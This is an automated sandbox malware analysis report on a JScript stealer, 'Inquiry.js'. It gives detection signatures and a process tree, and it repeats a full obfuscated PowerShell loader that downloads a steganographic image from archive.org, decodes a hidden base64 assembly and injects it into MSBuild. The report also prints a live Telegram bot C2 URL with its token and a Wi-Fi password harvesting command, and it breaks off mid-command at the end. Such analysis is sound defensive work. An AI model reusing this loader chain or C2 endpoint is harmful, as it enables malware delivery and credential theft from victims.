Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inquiry.js

Overview

General Information

Sample name:Inquiry.js
Analysis ID:1591681
MD5:459f759046d6def3f4524d28eab22476
SHA1:46af0da70b77d98d4773023554dacc1f968b93a1
SHA256:70a82edf7f26167e6b7df16d624d29d45fd220bb47b8407bc58ee6f7b8c822d3
Tags:jsstegocampaignuser-zhuzhu0009
Infos:

Detection

PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
Yara detected Telegram RAT
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6776 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 3412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • cmd.exe (PID: 3760 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 3140 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • netsh.exe (PID: 4088 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • findstr.exe (PID: 3020 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • msiexec.exe (PID: 7156 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
{"C2 url": "https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    00000007.00000002.2118047859.0000000003824000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
      00000007.00000002.2118047859.0000000003828000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
        00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: powershell.exe PID: 2596INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x60c:$b2: ::FromBase64String(
          • 0xf68:$b2: ::FromBase64String(
          • 0x5d6e7:$b2: ::FromBase64String(
          • 0x5e191:$b2: ::FromBase64String(
          • 0x7f768:$b2: ::FromBase64String(
          • 0x8775f:$b2: ::FromBase64String(
          • 0x93610:$b2: ::FromBase64String(
          • 0x93f6c:$b2: ::FromBase64String(
          • 0xa9e3c:$b2: ::FromBase64String(
          • 0xcad28:$b2: ::FromBase64String(
          • 0xcb63c:$b2: ::FromBase64String(
          • 0x31a:$b3: ::UTF8.GetString(
          • 0xc76:$b3: ::UTF8.GetString(
          • 0x5d3f5:$b3: ::UTF8.GetString(
          • 0x5de9f:$b3: ::UTF8.GetString(
          • 0x7f476:$b3: ::UTF8.GetString(
          • 0x8746d:$b3: ::UTF8.GetString(
          • 0x9331e:$b3: ::UTF8.GetString(
          • 0x93c7a:$b3: ::UTF8.GetString(
          • 0xa9b4a:$b3: ::UTF8.GetString(
          • 0xcaa36:$b3: ::UTF8.GetString(
          Click to see the 4 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6776, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.16.184.241, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3412, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", ProcessId: 6776, ProcessName: wscript.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6776, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js", ProcessId: 6776, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += 